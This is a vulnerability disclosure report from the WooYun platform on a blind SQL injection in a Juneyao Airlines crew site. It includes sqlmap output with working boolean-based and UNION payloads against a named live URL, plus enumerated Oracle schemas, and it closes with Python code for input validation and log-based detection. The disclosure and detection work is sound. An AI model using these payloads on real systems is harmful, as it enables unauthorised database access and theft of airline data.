Vulnerability Summary

Defect ID: wooyun-2014-048636

Title: Boolean-based blind SQL injection on a Juneyao Airlines (吉祥航空) site

Vendor: Juneyao Airlines (吉祥航空)

Author: Mr.leo

Submitted: 2014-01-12 10:47

Fixed: 2014-02-26 10:48

Published: 2014-02-26 10:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2014-01-12: Details sent to the vendor; awaiting vendor handling
2014-01-17: Vendor confirmed; details visible only to the vendor
2014-01-27: Details disclosed to core white hats and relevant domain experts
2014-02-06: Details disclosed to regular white hats
2014-02-16: Details disclosed to trainee white hats
2014-02-26: Details disclosed to the public

Brief description:

Boolean-based blind SQL injection on a Juneyao Airlines site

Detailed description:

Site:
crew.juneyaoair.com
Search engines turn up several instances of information leakage on this site, and one of its URLs has a SQL injection vulnerability.


The flight_date parameter is not filtered, which allows injection:
http://crew.juneyaoair.com/admin_purser_an_detail.jsp?flight_date=2014-01-10&userCode=S2018641
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Place: GET
Parameter: flight_date
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: flight_date=2014-01-10') AND 4609=4609 AND ('tQYS'='tQYS&userCode=S2018641
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: flight_date=2014-01-10') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(121)||CHR(100)||CHR(100)||CHR(58)||CHR(89)||CHR(118)||CHR(66)||CHR(74)||CHR(102)||CHR(72)||CHR(66)||CHR(112)||CHR(71)||CHR(72)||CHR(58)||CHR(98)||CHR(111)||CHR(115)||CHR(58), NULL FROM DUAL-- &userCode=S2018641
---
current user: 'JXFOC'
current schema (equivalent to database on Oracle): 'JXFOC'
available databases [12]:
[*] ACARS2FORHO
[*] AIS
[*] APPQOSSYS
[*] CDM
[*] CREW
[*] DBSNMP
[*] DTM
[*] JXFOC
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] WMSYS
599 tables; the partial listing below is enough to show the problem.
[09:55:35] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[09:55:35] [INFO] fetching tables for database: 'JXFOC'
[09:55:45] [INFO] the SQL query used returns 559 entries

Proof of vulnerability:

Demonstrated above.

Remediation:

Filter the parameter; the vendor should also check whether any other parameters are affected.

Copyright notice: reproduction must credit the source, Mr.leo@WooYun (乌云)
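The remediation amounts to strict validation of flight_date, and the sqlmap output above shows exactly what an unfiltered request looks like in a web server log. As an added example that is not part of the original report, the following Python checks that flight_date is a plain YYYY-MM-DD value and scans constructed access-log lines for the shapes of the two sqlmap probes quoted above (quote-and-paren break-out, numeric tautology, UNION probe, Oracle CHR()||CHR() string building, trailing SQL comment). The log format, client IP address and signature names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures matching the sqlmap probes quoted in the report: a closing quote+paren
# that breaks out of the literal, a numeric tautology, a UNION probe, Oracle's
# CHR()||CHR() string building, and a trailing SQL comment.
SQLI_SIGNATURES = {
    "quote_paren_breakout": re.compile(r"'\)\s*(AND|OR|UNION)\b", re.I),
    "boolean_tautology": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),
    "union_select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "oracle_chr_concat": re.compile(r"\bCHR\(\d+\)\s*\|\|\s*CHR\(", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
}
# The only shape admin_purser_an_detail.jsp should accept for flight_date.
STRICT_DATE = re.compile(r"^\d{4}-(0[1-9]|1[0-2])-(0[1-9]|[12]\d|3[01])$")
# Assumed combined-log-format line: ip - - [timestamp] "GET /path?query HTTP/1.1" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+"')

def inspect_request(url):
    """Return (flight_date_is_valid, sorted list of signature names hit) for one request URL."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits, valid = [], True
    for name, values in params.items():
        for value in values:  # parse_qs has already percent-decoded the value
            if name == "flight_date" and not STRICT_DATE.match(value):
                valid = False
            hits.extend(sig for sig, rx in SQLI_SIGNATURES.items() if rx.search(value))
    return valid, sorted(set(hits))

def scan_access_log(lines):
    """Yield (client_ip, path, signatures) for every GET whose parameters look injected."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        valid, hits = inspect_request(url)
        if hits or not valid:
            yield ip, urlsplit(url).path, hits

# Constructed sample log lines (not from the report): one benign request, then the
# boolean-based and a shortened UNION probe, URL-encoded as an access log records them.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2014:09:55:30 +0800] "GET /admin_purser_an_detail.jsp?flight_date=2014-01-10&userCode=S2018641 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jan/2014:09:55:35 +0800] "GET /admin_purser_an_detail.jsp?flight_date=2014-01-10%27%29%20AND%204609%3D4609%20AND%20%28%27tQYS%27%3D%27tQYS&userCode=S2018641 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jan/2014:09:55:36 +0800] "GET /admin_purser_an_detail.jsp?flight_date=2014-01-10%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%2858%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%2CNULL%20FROM%20DUAL--%20&userCode=S2018641 HTTP/1.1" 200 6001',
]

if __name__ == "__main__":
    for ip, path, hits in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(hits) or 'malformed flight_date'}")
```

The same STRICT_DATE check, applied server-side before the value reaches the query (together with a bound parameter rather than string concatenation), is the fix the remediation asks for; the log scan is the detection side of the same control.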


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-01-17 08:49

Vendor reply:

Latest status:

None yet